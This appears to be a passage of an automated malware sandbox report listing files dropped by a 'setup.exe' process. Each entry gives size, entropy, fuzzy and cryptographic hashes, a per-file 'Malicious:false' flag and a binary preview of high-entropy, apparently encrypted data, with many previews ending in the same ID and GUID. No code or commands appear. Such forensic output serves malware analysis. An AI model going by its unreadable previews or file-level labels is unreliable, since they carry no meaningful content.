              Preview:1,"fu/.8$....n.......?r.E..I`a2. 3.\...%..+......N=.Uk..'.F.u'..~/3K.+.3.....A...r.....M...a6.qp. ,..oK0.Y..|W..|....u.f..9;l.q..L.U...z^.r~.:^5.f$Z*D._.... ..\.V.R...\..b...y}1..}..m.A.x.8.YVp.b........%.U3..(N[..o....O.I.'N..$.62...1..>.v..z6b..^.._...*Bz........f.{[...2..3.fTh#...Z.gC..]..B....&m,xz...c$..G.V....!t...x....D.eM.Z.J.5.[73.........Ct.F...:p.Pr..1..9;....w.G;1.X..O.9..%.G..&...Z.J.N...\....&....m..Q....rE....(../..EFl..Hd?.....G....`......G\..uO......b>..:......Vq|.N.....Y......3%%X....7...>U..JZw2k."pB.q...|...Y.hv }M......^Z.bxb....{..(. C..im...i...C..,.u..`..h...G..v.Ne..E.t.O.....D..V....."..4'....n":GX.]u"z.QC....D*.PPm...}.......3..7C.*8.....ar.....R......N......K.=.>..D.qk..P....|.......^..L.:..G.g.h..j....>.WlZ.l........5......3*K..jut\m|.Q...".........o...,....2$.Xp=B.\y....(../.Y...@M..3huV2^$F....x...a.....s..*kk.].@..c.P.6Y..}...E&...-{.t.vKi.v..&y..@.6...r.p..i..k.../....c.}.6......HU..T...56B..fx...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1952
              Entropy (8bit):7.897284506871916
              Encrypted:false
              SSDEEP:48:YCYaSG9FvLWOLhu+1hxQZQZHZNVRqCNn2ED:YC4MTWOLhh1j0EzVV52Q
              MD5:91C1CA5CC6D3EA315308419F70745112
              SHA1:717D0F333BDAC3F5780114E365012A1FDCD17DCF
              SHA-256:08D92C8C15C2309E96194E0824F8D51B15A1103D2CB216D1E04C61A73BCD544A
              SHA-512:56C219DC9C1F3C7CE898FBE133EC9F5932C5773852699532765B8838557AB9A906D29A50C63A69ACC52CB72092DD9C9D05FB5B2F39C68779B2AB1C082526F8AA
              Malicious:false
              Preview:1,"fu..Q...NL....X.B.d..o: ..A....v..?qn..y4..2P.....RL....c.e^.....Se..d.Q....GNn.vHV.Jx.a|.y..g......=o........m.........S.@.n....Z.=..C.(......J.M.mbIb...:ko.9.DT.f.=..}<..H(y.T....LSDx.....sBK....._.~,...Q.^.Ue....d..U...._.U......r.k$WAVnM..a.$"...[.......3`...n.....E........h{.].=.......' ..(.M.v.....\.V.p9.oJ7D........H.7.<...r.Z.F..L...j.m....6......#!~.Ep./..F...b7[..&7...n._.d..>h.1.r0H..:....H.".....(.K.E......FZ.2.`.h.t.BU.9..SQ......&.t..R.#L....Wd.3.......!_.j_&......D.lf%?....A..............s.i...z\^......X.d..X......k'4.......#.6....H.0=..O/$.X..m[.....E.I.......=.....+...7A...U.b.u}.R.iL q..L...z...4.l.}7...Z.j.....jIT...+.....H..M...`....'.....|..|^.~..[.>...5.g..K...(.V_b..(....~W...|.t.9_..X`.]..k$h..b.....8kB.x..M.....l,m.@....]...rl.u.28...I....Xr.,#.:b. ..6.Yt...bS...E.E...FW..A..8.@....,..T.mO.|........3.e....CoB.eJ^pc4..#.8.G...nBz..JR.. ....."K.^....~V..:.1v.......r^.C...rN.q..............10...*.....#.....-.pj...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):400
              Entropy (8bit):7.387328753779778
              Encrypted:false
              SSDEEP:12:alLe2HO6zOCSDcmYYfFiSp5Uhzn3risMR2cii9a:6e2fmYYtrUh73nbD
              MD5:1C4FD033DC67432727A1CBBA30CA0452
              SHA1:B9B3D263E8A7B8226F037B8E3041AF77042CF2EA
              SHA-256:F281373D0C325667577121D2226F0A4F9912B30785044A44A5BCFD13D1EB3314
              SHA-512:171DF9FD020448EB30353D22657829E56458D5049AB14DE662B8E170121D3A17332139EA15383D9838385E3B504D13B1BA9CC99A500CBB8830909522E4747543
              Malicious:false
              Preview:1.8BFOH..&B..J..!.Z.(=....>.cr......1.Zu[..p......=...`7..G8..F....uj1C....l...A.......B.N.....3...M......]!....du7..g...I5.v.e.k.....w<..&.xZ,.r..).?...}...C.+.... ...>4?.\1......{..=...Dx1..,.g"*[..i.!...\.Oj.=4.......'.....W.7....@.....sl....D..dR...a.}B...8...v."....F...................0W(]...u,...~XVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):468
              Entropy (8bit):7.475944650781251
              Encrypted:false
              SSDEEP:12:pATkWinxbR0OjyYWGACJEpvIrjJsMR2cii9a:2YXndnEpvyjWbD
              MD5:8E69BC4A7558BC2F3AA86C4530191D89
              SHA1:D53DDF91631D9092A7A873F4C27D4A4BE3A810BC
              SHA-256:162D276FF1FC1C40982C9E514734CEEF7C21737560DA5450F14083BC27241C40
              SHA-512:5ACBEDFA5822375DC2D03E331E31CDDDF0C7F552E9B095D6D977801D55D9CCDA22A6961E318642DD5F0A2DF36C1349F464145C99129B456A40AABBE89B1F8242
              Malicious:false
              Preview:{.. ..e..LRP..0R.O.:'Z...@.a..z...a.....i...|Qs)%.4.{R..q....t..^.c..g`.x.~:......D......h..8dh...Z...#...z..M(X~,.4.w.}|.S.o.h...m%...;..>.U..&.$x_......=.[J...\..-..M|.+..L$...}../w..+.V.X:{.....tn.D...~.[a...x..g.C.(B....k..y%.i...B........~..+........+x.~.......o.1...2..>.w............nx.*......_T..j=.w<c9....OF.......zo....h.M..%.;...Qg.....C..8+n^.._x..41_...D..._JVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3498
              Entropy (8bit):7.95386101015292
              Encrypted:false
              SSDEEP:96:11h/FSNGO9nUnjcTCDSfXVFeva15nCa41BN:11h/FSNGOwmdF715u1X
              MD5:0D795D25EF25DDDC19C8022F64BDA355
              SHA1:D18D9BE1D614281DF9A0D9DC769E5F5903FEF0A8
              SHA-256:948DA02660F59C41354E4A15BF711FC59EBE4A9C662E048FC4CD21BD4641D1D1
              SHA-512:AE83E7692334326A6F8F9B3C44EF52054108CF34D2FFF5298685055A9CF3D0643BE96DC410E75400CFD055BF076086EDBB5673F56AFCA1F0231CE28C12D9E83C
              Malicious:false
              Preview:{.. I....._.."0..E2E.v2.Y....l..cxb;.aF.7.3.$...Y.'....?....Z.s...~..r..&...|@..f.0..D.....l....i.....W.2.I...qJV...L.]{.....t...g...;FJ1u........@.U.c..fzXz..P-sw:N..J...HZS...+......d.-.x.J._..K..J.hFF.%..x....Zc-.....D.8j....fRUy.....~a&.gw....I..WD.&....D.D!.~."<.gd.f....z....7..2jt. ...bX>R.....a...v4...w....W...y.|......}....#.p..&.30...`v?.P]#.A...~..y.n.N.J{b6.mND;$L~.._..n..I..w.....>.Ty.j1'.u......b<G..#.....}xk.]...r.Z._Edd...x$.D.z..c...^.}3=~...M..B..:.:.....eC.i.....s\.G:.u.\`p.Sc.......l.S...>b.$../.6...C.$..9...5.C.B.a&.@.7.*...]..9.`.[:R..&;...5/.M..:m......3t.;.{.c.zR.'...Z..m..XQ(....*......W.|%..z...u..d~.S.^.. n..s$...p..Z...BW....It.;..#...g.......>..>..X..3..#.......Q...N2.I.,...O...K....yh...A......9....\.J.3.|\..1I+......6.z....#Z.....P.n.`.....%...F..dv.....Gio..z.r: 1....Mm.....<./..@.E....z....*.>./...EdU.D..; ...$.f'<......,Lk+ib.....q.)..-:....._O...st.dE.......Q....-....+$..........RBL.......yNyN....."...7_Z^....#r_
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):218058
              Entropy (8bit):7.081376707838159
              Encrypted:false
              SSDEEP:3072:S0tkF0A8LVWLjCBptlC8E8XnArZuOIUroIrA5/mrXdOidFWmBBdFG1N196rd:wGAGVW4bl28XnHOHoI2eVBdFG1Ird
              MD5:C863517487F611856448793B1AC8146A
              SHA1:D5CF65457F93F7E6038068A45B3B6AF269AE83E9
              SHA-256:A1C28B3DF079DAC20BAC5C64A2F43DD629A60932E34430ED9B4E08A1806641C8
              SHA-512:B88D5D4CCA31F22911F5B85AD5582652700DF32892BBE212A9334232753B6C4C08F60D534F91CA66824588B021E88064A84DF2E49D4CF25C449C0993AC36D81C
              Malicious:false
              Preview:{. ]..ka.B....1oK.OJ...-....D.c9..,U..7>.kc1..&...2..S...$.o.!...8...G.X.2.0..J..."..R..T2E...k....s.HH.a?0..Hx.g...........w...v......?..b.J...K.v(U..f.b.?..N.&f.:.8..sK....s.K.E J.._G]..X`R=aqRUi..Sq..!.@.4.F..=.s.V..........<OB...Ut....e....,l@n!Q+..y.9...f..c&f-.....^.7..P.......|ON....mb.2.q......]Us>kr.Q.K4F..c...I...`...ugx...S.o.....U..A$.l....E.#.-....U..|i.x..a.I!...?A....6..$.:....u4w.%.u..].s.U....c......MI!...t.|...?....r6..y....;.^..6..@....,M....U..aG.............=..3D.Pz..!H.E..\.b...#-. ........&j..7..I..Cx.....,....J.J..t....TBh.)y.3DR&.o..X....D.N1..$.++vJ...L=G..m...h...|.;.n..jE8.m.cE6M.z..@.......lw.Y...&..[....)..<.?.o..G..;rv._2-..fe..qaIC5?...Fk........4c.m..?..Sx...u|..g...5.....6"..D...l..F.|.[f..<.....-.$..nIP..<..P..E.oG_..X*...Z4T..L.E......].....M6S..2..3a..J..%..6|F?Y.)...*.E.IE{;..-@.Az....y.L.e...|...[O.%...Q^F..t...tw.9-P.. ..J..K:p...h....Tg......W..u..O(.,S.Eb.o@.i+@t..v.$..-.fJ.]<..i.....X.P...]...Q..w....1
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):4729
              Entropy (8bit):7.955020019464117
              Encrypted:false
              SSDEEP:96:Rx5cxPq0b/u4YnoPbrsZRAxx7lEYqIT5lr5bcQ71dT3daD87OOT:6ZGfnMxxRu/CvNcKp3Rd
              MD5:532B6A26E6DB6FA4B7721FC7FD250EAA
              SHA1:4991802183854416B6A30C36A6CFD193E424194C
              SHA-256:E894728E6BA41AC7571E38590C85A110FCBD46E86AB3D45CA252FD94ACE3F536
              SHA-512:100A021D39789BBE0B8CD625FB1EEAA3DC18795F2D96C24BA14F61CC67EAD5E267E08E1F23542729F0ABF586582B5E72A8975A861F976700CEDC6C3A3164D047
              Malicious:false
              Preview:{.."gZ...Oo.L..K.V....:..?....c4.Q.=..^[..Ra~.w......^.}..../."..Dd...,.u...w*.Q..eq.B.2.5.U.ir")6.....).H.\..W..t.8."5."..BII....v...B.Q..qZp..U...U..+..d.j.~|..7.......j..{l.>....9S........7n0+....1Wf~.z=s.*D.d.........FB.V.?. .@.....S..Kt( `<.b....&...Q@..U..q.......^i.....fd..Q.V8..T.(..>...."...<..w.pw.Z...2c==.A$>j-q>..j..W....@....K.Y.;U......$y..........;.3!.+..<m...q.4....C.w........sX.%}.....IE..57N..R.[.I......BE..&...K.$....7F#...H...<.^"]/m..s.q.....:f"$..E.[s..5.t.@8REr....g...FA...z.XX ..5..+....A.C:.B83 ImJ..'ju......W'..L....h1.....W#..i..!r....Hs.n...l.G.KQ.....u.h4.r'=.-.?%D.Q....M?.e.....b...*W.....mm.O]%.b...x.4.:.Q.>..s...s1uJkD..(....S<../..+.......#,.o...=......a.'..B...K.P...NLw../...-.....7..7...[.&j....c..E!.../r..A..5W57zB.......9.E%.O....*._..<?......!.@.U.*v....cR.n.zF.F..].6.B..Mu4.7.Q.3..(...0.v.=~.kD..Z..z...T..&1....\.?.^h...i.x...@u8.../H.....Ki.W.D..L....P.K.D.m.y..:..b.y...l......&P...W.PM}..QVk..r4a
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):400
              Entropy (8bit):7.302061814914181
              Encrypted:false
              SSDEEP:6:SUkgXQEB3pgr1pf4dyllPH01Oayrv+ycqtTI/rOwWILLZwNoNr1gVxWsXkNR2ciD:kgX/3iQybYOxLSawPfsQKVQsMR2cii9a
              MD5:77277E35984AC5D5D47A1969A97D1B3F
              SHA1:6E4ED328227E0DD860F14EC6FE31117A0CD4A72D
              SHA-256:2DA8BEF49E588899637046C6261DD7D8654BB2933A7911D037AD7CD6974C5E84
              SHA-512:DD1B95C8FA7C9AA763899B077760D125857C457D0150A661486267A65FA15C74785421493AE7499D8510C0AF3A365BD8BE5FF8FE33C37ABD88D2F6D2617F29EE
              Malicious:false
              Preview:1.1ED.....$zg....N.N...4;...}.&.C.;.....EBS..x._.........vA../Ga.....s.1.:..Q...S{.s...@.....H%.{.1....r~i......."8u|......zE.[8B/V..I%..+l.ClG..1.......I..}.....t..n..v..X...5..yF.m.\.g.{..]*7B.....d4....*4...g!.8?0..d..........(.xs.Q<.....m..x.<v.*.? 9..*I..{..8....n.....tqW.%9@H#.....tCE......PZ..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):452
              Entropy (8bit):7.442892868008281
              Encrypted:false
              SSDEEP:12:MIu+uJQhVpRVj0uh3OgXu8G/GIoGuCsMR2cii9a:MIROQvpom4ybD
              MD5:ABC483EB64FE65353235CC654E559537
              SHA1:9E38EE866643C80971A2DAC03C32A79F218E1559
              SHA-256:8E88C664AA6B23508131962AB9D5F06E7918C561563B8BF0BC710AAED4404A0B
              SHA-512:81B8A2596D97A84BD8075DB8BC544E7494D61D41B9DCD976792AEACF0AE62725FA65FC01EA9C953A597AB73CF1C3C265A1C200257CEBB7A3A9220C825DF02F13
              Malicious:false
              Preview:.{.u'.,.8.A...I%.^..3......i...|:.A?8F..E..Bs.Q..,Ni$.....W.F.t^`...roTr2.l...1/...AN.Is1....5ym......P5..,.!3....p..0.....d.5....s^o.R.9..Y.o..........!.....6......78..=c$.Mxq........0..cT.O.#1............#BZ.^=.....}..`G5....4...Q...0..3/SX.r..bJ..,;.v%...C!.Qk.9.;.k.U..@"H..P..h.....tf..-.c..Y.m...,n.>.&.1.*.9..K. .0..g...RY....F.`.Q.JrR...8.Pf> ...U'...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):534
              Entropy (8bit):7.531070120971332
              Encrypted:false
              SSDEEP:12:saGQZWRgxHacjyztdLvv3vJCxFk51OOZy78lZ1jQlkQsMR2cii9a:WQcdcc7X32FW0pQ6ubD
              MD5:5FFB366FBD829B642343858329792998
              SHA1:838F17A17FEF3166FCDCFB2CC3CDF93EECF6C22B
              SHA-256:EE0A433A0FEBD008E080F25390740CBD5C75772B9602D468990C3C36FF994F8C
              SHA-512:34C3DF1F477623829CA81F93EE6764593B3D71FB42D9E57D933F94EC701C9E6246EF2F41BE0463DA8AF87EA89C514BE05F7820B7AF27071C242BA49B54D6638D
              Malicious:false
              Preview:{. "y.....J..=EkR4..%oU.....0...o.Rm...o....9..R|........".P.bV..C....w. Y..f|w.O..S..n.....R..Nr.i..%;.I.A...r.... .....<..Y..g..J.|co.8~V_B.8......m...C.f-...-....O*rv&r@P.&7k.S..j....zoa./@.&....ao..>.0..f.|...*f.../.36.;..\@..d.-1.HW.....F4}....Z..}.?E...*..!F.N.bf.#.f^....=#...;(X...n;.4...Ss.....K....H....sl.Y)!.2.h..{o..t..P.a............>...b`G.f1..[[..B...I.jl...z.......|7.....=.M.CMr...e$kYq...+*[.V.PX.....q../crg.bn*..<.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):520142
              Entropy (8bit):6.028033696502518
              Encrypted:false
              SSDEEP:3072:TNVB1+2lJDf5QQsOtNHeox13p39RSubemxmmAQmf+HJB69sIS7s6HI:9Tll5tNHes15mFkpB6Ov7sP
              MD5:498D8A5D3F21D3F7161575A2AE17BFE9
              SHA1:BFF67D9682455F74659DAEF8296513990954DCEF
              SHA-256:6BDA1C92CFB3030F28F8C53FEBEDA95642762EC13B6A22BBF55568BCAFE1DC34
              SHA-512:4E3325AD5FF7E1AAAB211BB957D8DAB6257C288C8A1C886A761672EAFD949F4398ADD11410D623EB058D7B0018799F030181C687A3FBEBD3884F12E682CF0D3A
              Malicious:false
              Preview:{. ".V....R...dt..6.?Z...._sB.....M.../.{q..4..g.*....F..+N.hh....ah0...b?.$....35.......[/..E$I.rx.r..j..>...4......D3#...B....F|e.?..QU.&Mj.d0..**..>.&?..\....&(.I6.X.13.4?.r...T...xV}.....3..s=d..}.4I..'....9#.(.L....wi...P..xhL.[:1.....C......F.K......D..ca.._....o...`..v...............:y......1<`sm...l.G.].6...r.m....>S.....:1..q`.G..G..S^\..... .]&9...-...!....:.=.zR....m.q !.O.D\.!.T]e..\..|.^.C..U.T".].nza...W..]q..}l..}...(...5%...u.....d.nhh......1.....!7G.....C$.{.=..GP..9.o..4..X$.5+..`.H.6.s9.a)..k.N..].nG........ .*H...W....&....7.....#v.Sf..U....^...L..y....U8W....A.K.E..L.3S.A.A.f.>x*.qx.bat.....m..p.:..tf.......~...8.'?.+.F....^.'.:.C...`......gT.\%0(@@..#>.+..F0..S....Us...#..O.p.;.9..M|.&r.......2...s..Ezh.c;=.....A.;U@.;v.$.p@.`."E.....W.\G..6D!..........S.i.Jf.".g.^ wz/.ET.py.(..0.......[.........X....z..I..$./.e6.f..P_..#P=b..j..-J....|.[...V...."..,2u)Gv...-.{;..s]p..Xw..k....<.h.....A.;.C..}..;...K..c..BeX.+.4....iJ1.@H
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):4194638
              Entropy (8bit):0.5183966825013012
              Encrypted:false
              SSDEEP:3072:gciZJpkeXpeEksYlAfer5KwAT6da/v524fq2Efm6c9ZuIlBb8M:FckVizDRvcx2EM9Zbb8M
              MD5:B0A423B51907B454F34A62248ADE8B58
              SHA1:552D09D89660DF4D5C72422210F90F885C750386
              SHA-256:D42AFFF6756E63A273887CEE621E1074E57BABB2CFBA80ABC109D8A2433F0B08
              SHA-512:8759886110BF864624637E7191D6B103E1B1E231573E27B1CE6D1C99D8AEBCEDA906C765EDAA46E69A71253549A2826B8EF8AF834D8EDCD26EFE9D6BF2A97101
              Malicious:false
              Preview:.......=....GVk\F..b..Qj_......:..7.7.........3sKJ...=..?3..v..y5*.9Mj.QL.[..E.H.0..v.F.~C,+.)..X!..Wa..L.ce..I.e.7...a..i+yP$c.v.$sC..hV....'Cc..2.P...]..!..Vq.3....I]..S..o.b.?z..x.o....e..+.Y^H....\.]..N.ed:.(..QB..a.,.}...+.......`..r4.............&......_bl..0AS......n.....S.h....RR.'...2"e\ .0.........Y.?d..k.q.O%.v.wG.P>b...Y....xL......p....[.."`.T...S..'1%..Bi..gw.I.nAE..u..A...c.(.....:>.zZ.0s..9...c....[.. .....R..bo&] ..?...../..\.Z..+.-....]..~*...D...9..'...+.X..c*HL2n...G..1....RZ...............1.......s&....'.i.9.vZ ...+v3X.t.."b.W..@)h`,.\.d..hR.I...4...n.7Z...N..FL.hL.@dye..V..v{.....t...gz.j}8.........P,.........AX4.%Z]..s...S..1.r....Nr..i.b....!-f...,s.$..+}..\|....%c..K{..d<Km.c.7..2....Y..1.].1...k.:..t.O..!.....j.7J+p_...R...D..ZT{.I.H..%|.Z........I..~..8?i..r.q...."..t..;.......X.KJ@.>=.5a.b....Ry.....z|..Lwg...T....R.{;1..uN<.0CW0x.......{u..LQ[..4.U..!..G!......:3...[{..>....W*;.bj.h.U)...C-....rX.z.Rv
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):400
              Entropy (8bit):7.335111396496141
              Encrypted:false
              SSDEEP:12:G/u2Aey0HJiw+mr1iM3fDmQYcW4w/sMR2cii9a:Gu0piXmrD3fDhk4PbD
              MD5:D4A1558212A1A7E53BD44E0A812610EB
              SHA1:0854C48BB0E81176E9E8162BB08EA3E50D1B7970
              SHA-256:82BF7DDB2D957F9BF723C62792E0BB5410C78EE90AD13CA3DBDBA0E80CFD95B8
              SHA-512:12CCFBE7434C56C7CE214A6B2A1B9E26AC3F1827A7BACE44E77651F6D8EF338090B2954C36F0A5B64568E8E33F87E7E5DE05B27BA5C465A7D1D372100F7F6A5F
              Malicious:false
              Preview:1.44C..>.F.{!..ztkN....L$...bU.R....m.ok.SZp.wlL..C...rf...zXZ...U..N.x./9t.....P.....e./*.."9..9a.z..v.]:rg.&....F.!../.f.Q..8...:......t.. ...s.c.....H.H...U..~:;....f..^k3"....L-..u...f#z.f+...5'!U.S...A<..6..eZ.O\.OP....}x..Sl....K...)..'..*.d...!....3..%.8.N.Qz..w.4.........$.=73..Cf...tY...*.53.FzVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):447
              Entropy (8bit):7.392212147961075
              Encrypted:false
              SSDEEP:12:LitHyI41sQhqt6y28EaFjOAWNhyF8AsMR2cii9a:0HbhQ4t7EaJLEtbD
              MD5:EAABDF6F8D5811BAC601B184E718EDE6
              SHA1:B3AA455B60BBC817A66D2C5697319DAB18A8C867
              SHA-256:CCE5C8F7C0A33B9F595B0D1C258422EFCE3B7575D6F8C9CB4BAB4A488F47C06C
              SHA-512:8E9CBC41D2ACA40E3B1955ADAE7EE7B81DAB29A680C10CC713034574F5E36E61441085C48258568F6AFB3824A12A7C463811F56310469B89AE4D624108788AC7
              Malicious:false
              Preview:{.. .>b.C)Jf.z..{..3.L......q...$.{2.F.q..LVyw...>..F.J..P#i...*L..d._#.C..X.4./.Bk7......Zf...v7s.w..'.=.&^.N9.|...-...;a....c&^.......{..o...h.....V3...l{-"..WC.^g.e.,+H.@.....-..b*T..`..y.X$.N.\".{s~.6.8.Y4..=....1..$..."....s...,2..K.*$5...$.V_K....;e..XNe.....?,.G3..X{P..v.[..L...~...g.9L.T...A.\..I.L[0...../.n...V0...R.lR..J.x3d.JzJ,......FQVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):480528
              Entropy (8bit):6.572287578365705
              Encrypted:false
              SSDEEP:6144:jf/jfFezbQ54nufe0CPQW6PbZZ0OG1yJG/dKWb:zbkfW4nOe1HSCpVb
              MD5:5AEC6E054EFB9652E84B5AC47F9CEB64
              SHA1:A8899EEBCC501FCE934DD114EEAB48D8BDC9CED8
              SHA-256:6A41A49BE21617657E6E6C24B2E262D9B2F65D84F67D8CE1F4195FFFF9C7B10D
              SHA-512:FAB4CBCD460E98EC796B24F6C7E4B9C247F24A8BAEADEFD8978F6F1EDCAB0F5F11D388AB85044705D336A2263E92493F06A8402D60BD793ACDEE16642C3ED4AC
              Malicious:false
              Preview:...m..rbc..Y.d.{Xf.M.L.#..L.&.)..>....1...{..l...oB..D.7..4.`./...U?.C.\...o.x.&........5.....8..-...L..I.&.0.....t.;=...*.|...lF$%..n..\.g.3..c..."....:S.,O....{>...H.Zh.4.Q..xq.V`.b..!'<...}.}W.TS.U...Wk4.._...Y.(J..,..*.$6...7.v.a}...I.S.x~~.....k.$oX3....guj.qD...a.UH.Cm..x.H..... ..N.6.Yz.[lE(.I. ..e .3,J....g.q^.0....}.y......L|..q.....%.U.\.|.....pKU.4XLK.4.'s.N.b\..gF"..9.Vo/.rY..^Y..I....Q...(F.;.!.w.c.."..`..\.'..[.....R.t>)..0.IOfX.Q....bG..-..U....k.....2.....<x_....f...e.4..?RL%.z....R~..yi6.V.d.....i.b........h...z...q.6k.&q...Cs.Ay.........Ba_z.....^.[.7..<......Y'.......J.Z...pB+..b.[U....7`W.S0J..d.?O5...f}...,..O.M.F...W.`P...>}f...".Bc.0f..+e....B.....:./..........0...|...C...r.t.fd...;G......#........KWw...i6..K.8...e\..<.vT....u..;.{j...2:..}.N.W.U...5.FEsu.Q.y...N..!..d.......E6.........>R+_...x..z.x..........MU1.)...._.^...'.:...V..-;..Kw.RI....I..xh4k..j...,...p.|)V..*=o.......k.-.4]?H...|]..Y./.....9..h].BR..[..l
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):674
              Entropy (8bit):7.708077202490451
              Encrypted:false
              SSDEEP:12:kSCINHu4RaRtVWsXp7r9YDJC1C29HrUNm1xkvHtClY/wq7FkvIvTOeL/SOG6A998:lDu4OVWK3SDU1C2pIAoQ8wq7F3rOwntX
              MD5:CC1C18A27F6168DBFB14A8A69E4209E0
              SHA1:A25C5DE365EB8F0EDCA153C1603A5BE8B38F2E09
              SHA-256:C89C5E60F8F34374D39311948F509A1584AB7F83FA400C7AF65A5905128E67F7
              SHA-512:EA88D6CC0745DB54EBAF332115520A3C856079B34DC5FDDE1AD8DC5016F482A86CFCA1630D2A62D08854116602ECCC9EE01973088B8759876C4CB4151AAA61DF
              Malicious:false
              Preview:2023/..G.Ee....z..R.....@..<...a9?.i..qp..E._......+...q...+...;.s..)~6@....Y_.........i..j..f~......4:..?..k.. .)....SR.....sGK.g....-m3.Ic..$Ke..b..m.h.....Q\H...j{..nV.!..M..p...x..K..8.mK..fe5j.Z`..w.y..^..B.-.q0.i...a}%".C...\.....v*.*ez.......re.@.!.m{.*aG.loT.W.(.............]....s. JM.W......t..%..4....n.....C..N/G.. ....w.U...M%......).'i...eO..:k..y..Okg.r"..=h...d.M....X.[_.XgJ.$.....d..A.Yf?A.+9e{..9.C....6.....?.D)f..7oo.O.k.8.....J....@n..?(;.|.;..@dqVe.T..x.N....Wq..lL..#.....?..V@[.......n[z?R.s...3o......t.uM.V...........V,g...U...^SVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):367
              Entropy (8bit):7.321662530893322
              Encrypted:false
              SSDEEP:6:iwiVT0tl0jfktbpJXn3pDxF2qelc3vBunTv2DOjau9xugR5bqWsXkNR2cii96Z:usa0bLXn3pNFzelc3vYnToTu7VfbJsMS
              MD5:C26A2CEA165299709D88A699C237863C
              SHA1:DF2657C6C8368B9435068B3A61FAC1A9BB9C8F73
              SHA-256:2F4C91359062ACC91C114C56A93618171A837C14CBA6E978940FECB10130B67B
              SHA-512:F795BA4117D9608E8419A3F45B1DF1C2D5C3AC4B718DEE75EF0E7711190B6FD63A0B20D383EAF4533403DFC7629F926C972A0F017EA6CC4405C45903E94DAA8E
              Malicious:false
              Preview:...m.........."..H..6.w.|...YV...Z.W.T.X.A...Y.r.30._.f.Ny..xA....m..VH...@ ..,.0j..../.'g...F..G.0..c.S.....U...).D.......~........E.@.m../..D[;V/....s.y...e1...L.h..._.;g...?..q...Hv..9cD.6.....^.+............0.[gIV.J..v.+H..d.u"t>.h..`N.n.....iB..kJu].... h..+...#....c.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):686
              Entropy (8bit):7.696221293066995
              Encrypted:false
              SSDEEP:12:kDIE10tX7aCNUSroFsPJ2juX8XiUdesvUkurFvHt4VOz89ImzsMR2cii9a:4S7bGsPbT2elnrB2kzARYbD
              MD5:AEF919418AF30F02F2E462087C102ED8
              SHA1:A79866D9C77708C55AB37DE18B1445D69B8A9C93
              SHA-256:A8B8E80CEE49EDFDDF5C8BCDBBCE687F95F48184F580CFCE6AA85A11496700C5
              SHA-512:6D7881B5D3ACE8CD381444485E5BF0887A2F94CD101CF8AB8644324FB9D15868634E6D9B904FD2F1B1ECF3C69306D86386EE12BEF5FC7B7A08487B4E8CAD88E5
              Malicious:false
              Preview:2023/..k.#.9.3..,r..:....l..DB'....I...z).n}......~L-....yq$t...g..O...*{s.......Jm....._X5.y>.:....0IS........Ed.=......8.Y&@.?mZ....f.p.C...f..y.E/..>......;..`J..oz.0j.l...V.<.w{g..e.....;.9.......U..l{z.D..:..9..>.\e...6.-D......];..4pe.~'..\.`5.'..&.ag...Q.fj,A....8....(.R.Q.Au.....g..p.L.....,\z.G{A.../....-"..~.....u_.7....x..S...u......V=..qA..3r..5[]..1.Q..4.<..q.%..{9.s...LB.@_.....0.8M.....d.J..R.>.JkV.d..n.(......7..$!......K.%.x>.Qsx.+.j...8kW.Sh."kU9.....t[..[...VZ.3.....7z9X5.........h..f..m^.4........(j.-.d..]....t....v...eAB.......~j].f...f..Q..oQ(.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):33102
              Entropy (8bit):7.995785907749326
              Encrypted:true
              SSDEEP:768:Rv1SD3of5ExRdAxgAj9jWeDrv3cujUWdBrbdvT3hzkIj3Rg5lqgTE:RvsD3o56RdAXjdTfcGZd/DhgItgnqgg
              MD5:AFB88781755B54761725F2C702527A23
              SHA1:4AFF26964CE3A172FCEC800CECBD11C1104D6B4B
